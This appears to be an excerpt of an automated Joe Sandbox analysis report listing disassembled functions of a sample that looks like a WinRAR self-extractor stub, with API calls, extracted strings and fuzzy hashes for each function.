                                                                                • Opcode Fuzzy Hash: e29db3841e3cac596c2aa5df9f59b5580221106af80a371471668d29e16b4ce4
                                                                                • Instruction Fuzzy Hash: 8F418F39A1869282FB108B11A85C7792362FF85F88F0C4035D95EA7B97DF3DAD468302
                                                                                Function 00007FF65593B9B4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                • API String ID: 2915667086-2207617598
                                                                                • Opcode ID: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
                                                                                • Instruction ID: eb64e5714213aa0d5c6b8e6fbd84c595fca6079138b7a0837fa54a5b7c891fd5
                                                                                • Opcode Fuzzy Hash: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
                                                                                • Instruction Fuzzy Hash: E931643CA09B8280FA148B12A99C17527E6AF44F98F0E4036C85EE73A7DF3DED458341
                                                                                Function 00007FF6559487D8 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID: $
                                                                                • API String ID: 3668304517-227171996
                                                                                • Opcode ID: 3e5c1c837bf5b094cbf702a79e584555beddaf0efbc8773bf26ad6af60c03e6c
                                                                                • Instruction ID: 6c83d4f4e2dad2e939438fd209844edb4bf1dab3ada2d789ec44fd192442939f
                                                                                • Opcode Fuzzy Hash: 3e5c1c837bf5b094cbf702a79e584555beddaf0efbc8773bf26ad6af60c03e6c
                                                                                • Instruction Fuzzy Hash: BFF1BD6AF15A8680EF009B64D44C1BC2361BB44F9CF585631CAADA7BD6DF7CED948340
                                                                                Function 00007FF6559557EC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 2940173790-393685449
                                                                                • Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                • Instruction ID: 131c5731c98ce94d7fc0027d0dba40c700eefd6393f9766880d1e393b5dfa24e
                                                                                • Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                • Instruction Fuzzy Hash: B1E1BF7A9086C28AEB109F24D4883AD77A0FF45B4DF580135DA8DA7697CF3CE8A1C700
                                                                                Function 00007FF655934F38 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: AllocClearStringVariant
                                                                                • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                • API String ID: 1959693985-3505469590
                                                                                • Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                • Instruction ID: 329bea5c3dc7b40703c7704df04aa8bd3ec00a9c63aad7e0d4a01e6214882b91
                                                                                • Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                • Instruction Fuzzy Hash: 5A71277AA14B85C5EB208F25E8945AD37A0FB88F9CB091132EA4E93B65DF3CD944C340
                                                                                Function 00007FF6559572EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6559574F3,?,?,?,00007FF65595525E,?,?,?,00007FF655955219), ref: 00007FF655957371
                                                                                • GetLastError.KERNEL32(?,?,00000000,00007FF6559574F3,?,?,?,00007FF65595525E,?,?,?,00007FF655955219), ref: 00007FF65595737F
                                                                                • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6559574F3,?,?,?,00007FF65595525E,?,?,?,00007FF655955219), ref: 00007FF6559573A9
                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF6559574F3,?,?,?,00007FF65595525E,?,?,?,00007FF655955219), ref: 00007FF6559573EF
                                                                                • GetProcAddress.KERNEL32(?,?,00000000,00007FF6559574F3,?,?,?,00007FF65595525E,?,?,?,00007FF655955219), ref: 00007FF6559573FB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                • Instruction ID: eff5a5bf8e333eaa618de09b55de6ce88f6b820fd7b1dcaa0f67e2d03e080b41
                                                                                • Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                • Instruction Fuzzy Hash: 6931E429A1A7C281EE12AB06A8485B523D5FF04FF9F1D4535DE1DA7382DF3CE9548310
                                                                                Function 00007FF655951604 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(?,?,?,00007FF655951573,?,?,?,00007FF65595192A), ref: 00007FF65595162B
                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF655951573,?,?,?,00007FF65595192A), ref: 00007FF655951648
                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF655951573,?,?,?,00007FF65595192A), ref: 00007FF655951664
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                • API String ID: 667068680-1718035505
                                                                                • Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                • Instruction ID: 50ada5a8a2890b88277b73b9dc9be95aecbf1f74e3670cf78b4e69b2ab36cf9a
                                                                                • Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                • Instruction Fuzzy Hash: FE115E28A1EBC682FE648B00EA582B413916F08F9DF4D4435C85DA6356FF3CACAC9650
                                                                                Function 00007FF65593ED24 Relevance: 9.1, APIs: 6, Instructions: 120timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF6559351A4: GetVersionExW.KERNEL32 ref: 00007FF6559351D5
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF655925AB4), ref: 00007FF65593ED8C
                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF655925AB4), ref: 00007FF65593ED98
                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF655925AB4), ref: 00007FF65593EDA8
                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF655925AB4), ref: 00007FF65593EDB6
                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF655925AB4), ref: 00007FF65593EDC4
                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF655925AB4), ref: 00007FF65593EE05
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Time$File$System$Local$SpecificVersion
                                                                                • String ID:
                                                                                • API String ID: 2092733347-0
                                                                                • Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                • Instruction ID: 2a6a481ff47cd018786c4169cbe8fe3d2aa4423ee29cf8e956c1b9ecee9059a0
                                                                                • Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                • Instruction Fuzzy Hash: 11516CB6B10691CAEB14CFA4D4481AC37B1F748B88B64403ADE0DA7B59DF3CD955C740
                                                                                Function 00007FF65593F010 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Time$File$System$Local$SpecificVersion
                                                                                • String ID:
                                                                                • API String ID: 2092733347-0
                                                                                • Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                • Instruction ID: 3eead3e5b903a5d0af61019e98ba163d2d622be7c5ae692a1da86511e8bf04f9
                                                                                • Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                • Instruction Fuzzy Hash: 1C312B66B10A91C9EB00CFB5E8941AC3770FB08B5CB54502ADE4DA7A59EF3CD895C700
                                                                                Function 00007FF655937918 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID: .rar$exe$rar$sfx
                                                                                • API String ID: 3668304517-630704357
                                                                                • Opcode ID: 93dbb7d74f849ef92666457f8e9f641f008dc657da5001eee78cfd1c0618c12a
                                                                                • Instruction ID: c939d0ab87a9ef97b83884b38fa07db14909fe7d520a0d511a574ffd93b55ca0
                                                                                • Opcode Fuzzy Hash: 93dbb7d74f849ef92666457f8e9f641f008dc657da5001eee78cfd1c0618c12a
                                                                                • Instruction Fuzzy Hash: B6A1D22EA0468680EB009B25D8592BC23A1BF45F9CF591235DD1DA77E7DF3CEA55C380
                                                                                Function 00007FF655955CE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: abort$CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 2889003569-2084237596
                                                                                • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                • Instruction ID: 9f4dafed2061a94df177e6491f1abb45840be813b1d4c139c9626da44e5c31c7
                                                                                • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                • Instruction Fuzzy Hash: 39919E77A08BC18AE710CB65E8442AD7BA0FB04B99F184139EE4DA7756DF3CD5A5CB00
                                                                                Function 00007FF655954F80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                • Instruction ID: 9ede53612541f968dac1f857461bd2fdd204dd522a98fb547900b1da8e6eaf20
                                                                                • Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                • Instruction Fuzzy Hash: 2751C13AA1968286DB14CB21E548A393795FF40F9DF588030DA5EA774AEF7CEC51C740
                                                                                Function 00007FF65592CEE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                                                • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                • API String ID: 2102711378-639343689
                                                                                • Opcode ID: 4ad8962ae40659baaf1511d456c0931157e13c4a94880edc0a22eb1ae19da66a
                                                                                • Instruction ID: ecea991c85dfcb08f688966caadd948ace2408d6313659d4c62a9d4c0ee1c809
                                                                                • Opcode Fuzzy Hash: 4ad8962ae40659baaf1511d456c0931157e13c4a94880edc0a22eb1ae19da66a
                                                                                • Instruction Fuzzy Hash: F051C46AE187C145FB00DB64D8592BD23A1AF85BACF480135DE1DA36A7DF3CAC86C241
                                                                                Function 00007FF655947B28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Show$Rect
                                                                                • String ID: RarHtmlClassName
                                                                                • API String ID: 2396740005-1658105358
                                                                                • Opcode ID: 7e152e90957d1346e93cce3b53dfbd480fa38e990bdf0b518984ba75781cfd03
                                                                                • Instruction ID: 3995c8533744bfdd6ad426a6812134632e44c5d304038858704f363bd748c5b6
                                                                                • Opcode Fuzzy Hash: 7e152e90957d1346e93cce3b53dfbd480fa38e990bdf0b518984ba75781cfd03
                                                                                • Instruction Fuzzy Hash: 15518439A087C586EA24DB21E45837A63A1FF85F88F084535DE8E97B56DF3CEC458700
                                                                                Function 00007FF65594FD0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                • String ID: sfxcmd$sfxpar
                                                                                • API String ID: 3540648995-3493335439
                                                                                • Opcode ID: f7f09a535254ba7702706040489ea7439e58d63b661cc729fc85acc9afefde13
                                                                                • Instruction ID: d167352a66d9eb2d452ad75e21355001c6af0e2d0f36a3bc587acb555709a8b1
                                                                                • Opcode Fuzzy Hash: f7f09a535254ba7702706040489ea7439e58d63b661cc729fc85acc9afefde13
                                                                                • Instruction Fuzzy Hash: E9316F7AA14B86C4EB048B65E4881AC2371FB88F9CF581131DE5DA7BAADF3CD855C344
                                                                                Function 00007FF65594FED4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                • API String ID: 0-56093855
                                                                                • Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                • Instruction ID: ab631da0875cdab679e3639f88549e0618ef7f68072c974a9cab70fc272049fd
